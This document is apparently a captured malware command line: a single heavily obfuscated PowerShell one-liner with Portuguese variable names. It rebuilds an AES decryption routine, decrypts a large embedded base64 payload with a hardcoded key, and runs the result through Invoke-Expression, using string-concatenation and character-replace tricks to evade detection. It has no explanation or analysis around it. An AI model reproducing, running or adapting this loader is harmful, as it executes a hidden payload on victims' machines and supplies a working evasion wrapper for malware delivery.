powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI09972690008023797368066377468917CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIV8j9BK9bfs/lZP5zFepyR9aRZf8BDzdLeJ1Wr3rZYBw6jT7kuTdwSitjBTH6Sqx88yVFht6lnslkubPCFwxqncRlDrOw9owyJA1zM90PpRr0FaiG+XBe+UtMNx0zzpBZSa7qy/b9pIjbcvkqnwOM6Be0WWFDxVUlj0TDp91XwH/c6ciz+iu6mES3yq5+wAOV+zPJuNp5hqnddk0tEqxo/qMCo+cG/l6r3ezM1s2QQFmQ8AFnu00n4jTFSMCxwGmJXOuAFt0wBq5jfwNhiaVTTCeBRL+vRhYBKAGD/u1Dvw+qPTtj9QM1HRT6VDvUjK3PzbH+R2AR4nOSq9v5lFSm/4FB/+TP5hP/0G/K30EABLByahNrwdJ16uU9iuUdUxN+NdEE/cElVfqnk/AVYq5zOi8KMYjn+cBM7t37nFOU+0R7dqQpX1bw4M9xtDwytc8lEk+oLySfh6DkQx9ZP51+DlSOxtzP8BlibGMotYNxGINUMoFBpW0X5W8pofLjTrSt7qBAj097EKphKYe3dnFx994W4acnmzPqqTr9PR82rWmLbfQf2jbKptR1IhGuTYv9zQSE15Vrf85rElqm4KW35kLioiJMv56w49TVJdaAGq/G+se+SBcPFtd0cm2wycIuQ4pVC4xxw+WdpJi1FZv87Rwrz7pU1f5LIlkQi0+6eoNG6yxyTKoTJaQAuX2geHwz+f9R6YUS2D7ybG0Vvw+ZFtSb2YV8cqEjPCNT4AdDGlZYcPsf6Hbm1EvW5r7k+0F/yDLB/y2wX4CLIycRbGPZgnjXi4jl/RK4SeIOxoVCs0mtuhlxR9NC8ercXMf5/Emw/QTDPPHm3uTaueMrnP01pI2r2Clos+w8/I3AEeg0Gz8iE1h5bY5D0OUVA7NaAIFwW45kfIOBkH0D6efJmwO0pY8b7loXQGCQrpaKFIWDUM4r97poqR4yhZYSxi7iwH+Vl/YNiqosLi5Z81MJ2NG+ei7HNxiblmO1AZ89LR/dD0RunVNNNhBOJ20glXfhQablo+F3yp9MnWBGU16Whu0b6YAdUDUvUVnxmuvpy1sVCQUTPsID8xFq1R/xK5GuhKddgv7GGw5SyZsSIDp0vbCvsX5oX3OIOydStyJIHumBn7h4OZdqvwvPZBapFBOGY9z0eeM3eCmqn0yk6DyJu0+gi5P+zDlz8SpCj+SNGMTJz0l905+iyHMyMWnkggQmgVzyg1Q6TkjS0ZXZx393y9B2605wrJHM48GqCWK4XqzWw45YDLcHSdqf+UBwT7GfcFNHv00ImuK+RnIuKMlHCWkV2tSGFh0wWgQywUjcsnZ34gpxsLS1SAxWC6/IFwxYsJk/GBcEMH0rTPbUNm2J+jFt11Avnq+K7RF/SwZLc/leZ1akr2gXbw4IRwvGO7CMtEpzUm1Zdy4mb/6VvbqVTq44zZ26ZyUo6gblDsc0klLgF3zsOD6WSrKV3lnuwKRjndiyyki5Sg9zHqW6vFA3JeHtj8BLeOGKSkbOBxHZWnQ2oJ7RUYNjiEkGbh65ZTwaEvs4uRuedzxH0kPVOV507iFyClriTFrO1uoxRQsT09iGQiOoy+LVcGHswQA6jQ8EsbetUL9hQJXOrgFLBuWvyk/YWmUK/7aoFOtJ/sOFbmU430Td/Q/lIkds2Pa2fDor+IhZkK+vDjiTT88AV/YFn+sJUrtD/3/4UtT1FQqoB4YhPhlNOQO3j4jovLs0f4eqLACrrvVjz0E1KJe1UFyBf3QvCf0ym/956bEdz78V4FOo6XRV9Zd3o7x1Cb8dTqahS3VCCnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
2708